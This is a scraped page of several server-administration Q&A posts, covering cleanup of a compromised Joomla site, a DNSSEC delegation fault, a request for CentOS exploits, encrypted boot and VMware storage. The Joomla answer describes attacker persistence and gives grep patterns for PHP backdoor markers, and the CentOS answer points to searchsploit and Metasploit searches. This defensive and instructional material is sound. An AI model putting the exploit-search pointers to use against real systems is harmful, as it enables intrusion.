Deleted a cron job pointing to .../tmp/.kin/up2you >/dev/null 2>&1



Also, I'd be concerned that even if I did restore from a backup, whatever exploit used would still exist, so root cause and prevention is really what I'm going for here.


Answer



I strongly disagree with Chris S's claim that all files/directories should be owned by root. There is a reason for the Unix permissions system.




There are two basic ways to run Apache/PHP. One is to run it as the www-data user and have the files owned by a non-root username. Apache runs as a low-privilege account and must be granted access to particular directories/files in order to write to them; this is why Joomla has the FTP layer, to compensate. However, in a shared server environment, the fact that all files need to be world-readable means config files for other sites on that machine are easily read.



The other way is to run Apache with PHP under suPHP, which is what cPanel prefers. In this case, Apache runs as a low-privilege user, but all PHP requests are handed to a wrapper that switches to the username that owns the files. While you can now use Unix permissions to prevent other rogue scripts on the machine from browsing your directories, any compromised PHP script runs as your username and can consequently modify/deface any of the files your username owns.



Since you're not well versed in server security, finding well hidden rootkits, etc on the machine would not be a fun task. First, you'd have to know whether the kernel was exploitable (unless you're running a very recent kernel, the answer here is yes), and whether anything had been affected. This particular hack usually occurs through a compromised FTP account at which point they are able to execute scripts. Since you found that code, it also suggests that the 'hacker' using it wasn't very sophisticated. There are many ways that he could have hidden that code and prevented your logs from seeing what he was doing.



mojah is correct. Once they get in, they try to run a script from /dev/shm/.something or /tmp that connects to their IRC network, or acts as a takeover bot on Undernet or another competing network. You'll likely find one or two scripts running, perhaps a cron entry to restart them, and other remote shells hidden throughout your Joomla installation. Look for files in the /uploads or /images directory named similarly to existing files, e.g. img_1034.jpg.php. Attackers usually hide their IRC bot in multiple places that aren't web accessible, so you won't stumble across it when you log in, but they will have stashed remote shells in places that let them get back in, rerun their script, and reconnect to their network.
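
A few search commands along those lines (a sketch to run from the web root; adjust the directory names to your install, and treat the patterns as only a starting point):

# PHP files hiding in upload/image directories, where none belong.
find images uploads -type f -name '*.php' -ls

# Anything modified in the last two weeks, anywhere in the docroot.
find . -type f -mtime -14 -ls

# Common obfuscation markers used by PHP backdoors.
grep -rn --include='*.php' -E 'base64_decode|gzinflate|eval\(' .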



In any case, the task you're faced with is somewhat tricky. You've got a site that you need to stay online, you lack some of the experience with these situations, and, you just want your site to work.




Take a dump of your database through Joomla's export function, make sure it is a complete dump. Create a second site and import the dump to verify it. Once you are sure you have a good, importable dump, make a backup of the site. Delete all files, reinstall Joomla, basic installation, use the existing MySQL connection information - it might believe you are upgrading, in which case allow it to upgrade. If you are on a VPS somewhere, perhaps have them hand you a fresh image and reinstall.


Sunday, April 9, 2017

nameserver - Why are many DNS servers not returning the nameservers for my domain correctly?



My website has become widely inaccessible and I don't know why.




Up until recently I have been serving my website through cloudflare, so was using their nameservers. Recently I started using Route 53, so I changed to Amazon's name servers using my registrar's control panel, and found that my site quickly became unavailable (I am in the UK).



I used https://www.whatsmydns.net and found that some DNS servers around the world were not returning any nameservers for my website. It was the same locations every time I tried, including London, São Paulo, Germany, New Zealand and parts of the US. Most locations (around 3/4) were fine though.



I was using hover.com as my registrar at the time, and I thought that the problem might have been to do with them, so I switched registrars to Amazon. Once transferred to Amazon, I changed the nameservers back to Cloudflare's nameservers, waited for it to propagate, and checked again on whatsmydns.net. It was showing up green for all locations. Then I changed back to Amazon's nameservers. The problem was exactly the same as before, the nameservers were not returned by DNS queries in the same locations.



I have changed the DNS servers on my Mac laptop, and can access my website when using the following DNS servers:





  • Sky (my broadband provider) - 90.207.238.97 and 90.207.238.99

  • OpenDNS Home - 208.67.222.222 208.67.220.220



But my website is inaccessible when using the following DNS servers




  • Google - 8.8.8.8 and 8.8.4.4

  • Cloudflare - 1.1.1.1 and 1.0.0.1

  • Quad9 - 9.9.9.9 and 149.112.112.112


  • CleanBrowsing - 185.228.168.9 and 185.228.169.9

  • Adguard - 176.103.130.130 and 176.103.130.131

  • Verisign - 64.6.64.6 and 185.253.163.131



The nameservers I am trying to use are:




  • ns-1478.awsdns-56.org

  • ns-1953.awsdns-52.co.uk


  • ns-135.awsdns-16.com

  • ns-893.awsdns-47.net



I have read that some large ISPs have configured their DNS servers to violate the rules, such as indicating that a domain name does not exist just because one of its name servers does not respond. To diagnose whether this was occurring, and whether there was a problem with one of the 4 nameservers, I changed yesterday to use just the first 2 nameservers in the list above, intending to then use just the second two if there was still a problem. However, even though this change has had ample time to propagate (EDIT: perhaps not, given the TTL, but it definitely seems slower than when I changed the nameservers between Amazon's and Cloudflare's and vice versa), whatsmydns.net shows that the vast majority of DNS servers are still returning all 4 nameservers. I am not sure why that is happening.



What is going on?! My website is https://www.markfisher.photo.


Answer



I had a quick look and the main problem with your zone seems to be that the delegation from the parent zone (photo) indicates that markfisher.photo is supposed to be signed (DS record present).




markfisher.photo however is not signed at all. The result of this is that any validating resolver will consider all answers bogus and discard them.



To my knowledge Route53 still does not support DNSSEC, which means that if you want to use that DNS service you need to remove any DS records from the delegation (done through your registrar).



Demonstration of the problem in two steps:



$ dig @ns1.uniregistry.net markfisher.photo +norec +dnssec

; <<>> DiG 9.11.13-RedHat-9.11.13-3.fc31 <<>> @ns1.uniregistry.net markfisher.photo +norec +dnssec
; (2 servers found)

;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 55361
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
; COOKIE: 60e53f6e7a4d79f37a0879a75e14e274510b02d97b10da1c (good)
;; QUESTION SECTION:
;markfisher.photo. IN A


;; AUTHORITY SECTION:
markfisher.photo. 900 IN NS ns-1478.awsdns-56.org.
markfisher.photo. 900 IN NS ns-1953.awsdns-52.co.uk.
markfisher.photo. 900 IN DS 2371 13 2 B1FB8D1E60D7B54027829321A64B612251F95A41C0F10C912FA9FC6A 9EECEEA5
markfisher.photo. 900 IN RRSIG DS 5 2 900 20200206185213 20200107185213 21795 photo. AN2TWw41LL15uX55vfNaQlHvidlpngYb629gSlEyP+A3JiS77NHO5TvJ gI5QF4si5/haBEoABpuVU8opxxC0Jmv3aD09NkwjZXoqikxDqwjzO/PD wNlvHKOb25fgb1+gKj3JaGvqtAD8m+m2xotmxRo74xPmb2XOvEsGUS25 Cxc=

;; Query time: 94 msec
;; SERVER: 2620:57:4000:1::1#53(2620:57:4000:1::1)
;; WHEN: Tue Jan 07 19:56:36 UTC 2020

;; MSG SIZE rcvd: 358

$


(referral with DS record, indicating that the markfisher.photo zone is signed with the matching key)



$ dig @ns-1478.awsdns-56.org markfisher.photo DNSKEY +norec +dnssec

; <<>> DiG 9.11.13-RedHat-9.11.13-3.fc31 <<>> @ns-1478.awsdns-56.org markfisher.photo DNSKEY +norec +dnssec

; (2 servers found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54714
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;markfisher.photo. IN DNSKEY


;; AUTHORITY SECTION:
markfisher.photo. 900 IN SOA ns-893.awsdns-47.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400

;; Query time: 79 msec
;; SERVER: 2600:9000:5305:c600::1#53(2600:9000:5305:c600::1)
;; WHEN: Tue Jan 07 19:58:44 UTC 2020
;; MSG SIZE rcvd: 129

$



(response from the authoritative server, showing that there are no DNSKEY records, nor are there any signatures)
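
The same two checks fit in one-liners, if you just want a quick yes/no (the first asks the parent side through your resolver, the second asks the zone's own server):

$ dig markfisher.photo DS +short
$ dig @ns-1478.awsdns-56.org markfisher.photo DNSKEY +short

A DS answer from the first combined with an empty answer from the second is precisely the broken combination shown above.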




For a quick overview of DNS delegation as well as DNSSEC health, I can recommend DNSViz.


CentOS Vulnerabilities - Exploits/Payloads




I'm doing an academic project where I have to find vulnerabilities in CentOS and show how to take advantage of those same vulnerabilities.



I'm no hacker, and I'm finding this task very difficult: I see all the security alerts and their descriptions, but no explanation of how to take advantage of them.



Maybe I'm being a little naive, but all I want to know is whether there is any tool I can use to show that CentOS 5.0 vulnerability XPTO exists and to show it "working".



If possible something like CVE-2007-0001 exploit tool, CVE-2007-0002 payload and so on.



Thanks.



Answer



For locating vulnerabilities, I tend to prefer the more classic approach by default. Bugtraq and announcement lists for the particular software. Change logs, et cetera. Scanners such as OpenVAS can be used for automated verification and testing.



Verifying the scope of impact depends on the vulnerability. I usually seek out the initial release and any vendor-specific advisories for the vulnerability in question. From there, depending on the nature of the vulnerability, I can verify it by manual action or by writing my own script.



With full disclosure, proof-of-concept code is sometimes provided with the initial report. If not, I search the Internet and common resources such as Bugtraq and Packet Storm Security.
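
For an academic exercise, the local Exploit-DB mirror and Metasploit's module search are usually the quickest way to match a CVE to proof-of-concept code; a sketch, assuming the exploitdb and metasploit-framework packages are installed and the query terms are just examples:

# Keyword search of the local Exploit-DB mirror.
searchsploit centos kernel

# Search Metasploit modules by CVE identifier.
msfconsole -q -x "search cve:2007-0001; exit"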



You are going to find it difficult to find professionals to walk you through exploiting a vulnerability due to the dubious nature of the request. Most vulnerabilities do not require a high level of technical skill to take advantage of.


Friday, April 7, 2017

linux - How to use an encrypted disk without needing an unencrypted boot partition

I would like to know if there is a way to encrypt a Linux system that does not require a small unencrypted /boot partition.



In addition, I would like to know whether encryption can be applied to an existing unencrypted system "on the fly", while a user is using the system, thus requiring no reinstall of the OS.



Right now the solution I use for Linux is LUKS. I typically reinstall the OS (backing up and restoring any data that needs to be kept), create a small /boot partition to boot from, and encrypt all other partitions, including swap. I use kickstart for Red Hat or preseeding for Debian-based systems; the install, encrypted or not, is fully automated.




I understand that for all practical purposes this encryption method is safe: there is no way (unless the password is actually saved there, or something similarly careless) to extract information useful for decrypting the partitions from the small unencrypted /boot partition, as opposed to an unencrypted swap partition, which could potentially reveal data that helps decrypt a partition. The reason I am looking into a solution like this is more practical.



I assume something like this would need to be started from the disk's boot block (MBR or otherwise), or possibly chainloaded. It probably requires some functionality added to the bootloader (GRUB, for example) to prompt for a password and use it to open the partitions so they can be read.



I did some research trying to find solutions, but I have not yet found one that works; even the candidates that might work are not practical at all (especially with a 100+ user base).
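
For the record, GRUB 2 did eventually grow exactly this: with GRUB_ENABLE_CRYPTODISK it can unlock a LUKS (version 1) container itself and read the kernel from inside it, so no cleartext /boot is required. A sketch of the Debian-style setup, assuming the disk is already LUKS-formatted and /dev/sda is a placeholder:

# /etc/default/grub
GRUB_ENABLE_CRYPTODISK=y

# Rebuild the boot image so it includes the crypto modules,
# then regenerate the menu.
grub-install /dev/sda
update-grub

GRUB then prompts for the passphrase before its menu appears, and you are typically asked twice (once by GRUB, once by the initramfs) unless a keyfile is embedded in the initramfs. For the encrypt-in-place half of the question, cryptsetup-reencrypt can encrypt an existing device without reinstalling, though only offline, not while the filesystem is mounted and in use.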

Thursday, April 6, 2017

VMWare ESX Storage Upgrade solutions



Current situation:




  • 2xESX 3.5 (Soon to be vSphere)

  • 2xESXi 3.5




All four servers are running standalone. The two ESX servers are beginning to run out of hard drive space but still doing very well on the processing and memory fronts. We're not running any external iSCSI or SAN storage for the servers at all.



The ESX servers are also running Ultra320 SCSI drives, which are getting very pricey for the storage you get ($550 for 300GB!), so I want to shy away from just throwing more 'small' drives at the ESX servers, knowing these drives will only become rarer with time, which matters in the event of a drive failure.



What is probably the best solution? Right now I'm looking at the DroboPro, which allows for more growth over a longer period of time (nice for budgets), or at a Dell PowerEdge 2950 with 2TB of storage (using 3 of its 6 bays in RAID 5) but still with room to grow since it runs SATA, for around $3400.



I'm also looking at trying to get vCenter and vMotion; would either of the above two solutions have an advantage over the other there? By switching to external storage I'm hoping not to have to replace these servers until they are maxed out on RAM usage or the CPU load is finally too great.



Update




I will be going with either the PowerEdge bumped up to support SAS drives or a PowerVault with SAS, with the intention to end up running our VMWare from the external storage. The DroboPro is nice but not a long term solution. Here's hoping I get the PowerVault!



Thanks for the great answers everyone!


Answer



If you have any plans at all to scale out your ESX cluster - and it sounds like you do, since you're considering vMotion and vCenter - you need to pay attention to your I/O channel. SATA is OK with one or two servers pounding it, but if you ever plan to go past two, it won't scale well without serious engineering.



Unfortunately, 'serious engineering' costs a lot of money, as do SAS-based arrays. In the long run, SAS will give you good performance for longer on an equivalent amount of disk. The SATA architecture doesn't handle massively random I/O as well as SCSI-based disks (of which SAS is one). You can compensate for this in array hardware with larger caches that help de-randomize the I/O, but the fundamental limit remains. There is a reason the big array vendors suggest that SATA drives not be used in an 'online' capacity (ESX hosts, file servers) and instead suggest 'nearline' roles (backup-to-disk, email archive, that kind of thing).


linux - How to SSH to ec2 instance in VPC private subnet via NAT server

I have created a VPC in aws with a public subnet and a private subnet. The private subnet does not have direct access to external network. S...